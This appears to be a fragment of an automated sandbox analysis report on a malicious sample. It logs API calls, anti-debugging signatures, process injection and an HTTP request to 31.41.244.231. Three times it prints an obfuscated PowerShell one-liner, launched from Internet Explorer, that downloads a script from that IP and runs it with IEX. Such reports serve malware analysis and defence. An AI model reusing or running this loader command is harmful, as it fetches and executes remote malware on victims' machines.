CBsRHJwgIAEAABMzFjm18P//ESEXIIAAAAAfKlmcH1g4pPD//yCCAAAAHwtZDSCQAAAAEzM4JQkAADoFBAAAOIPw//8g/wAAABMmIHYBAAATMzhw8P//ESEZIJgAAAAfMlmcIAABAAA4WPD//xEhHxwfJh8qWJwgQAEAABMzOETw//8RIR8PHw8fQFicIAQBAAA4LvD//xEhHxAghwAAAB8tWZwg/QAAABMzOBfw//8RFBEZGVjgkR8YYhEUERkYWOCRHxBiYBEUERkXWOCRHmJgERQRGeCRYBMPIPAAAAA45O///yCkAAAAH3JZEy4
Data sent GET /AVAVA/WAW/F0.oo HTTP/1.1 Host: 31.41.244.231 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:812 CREDAT:145409
host 31.41.244.231
parent_process iexplore.exe martian_process powershell $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/31.41.244.231/AVAVA/WAW/F0.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');IEX $TC|IEX
Time & API Arguments Status Return Repeated

send

 buffer: GET /AVAVA/WAW/F0.oo HTTP/1.1 Host: 31.41.244.231 Connection: Keep-Alive
socket: 1196
sent: 78
1 78 0
parent_process iexplore.exe martian_process powershell $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/31.41.244.231/AVAVA/WAW/F0.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');IEX $TC|IEX
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/31.41.244.231/AVAVA/WAW/F0.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');IEX $TC|IEX
Process injection Process 812 resumed a thread in remote process 2328
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000368
suspend_count: 1
process_identifier: 2328
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe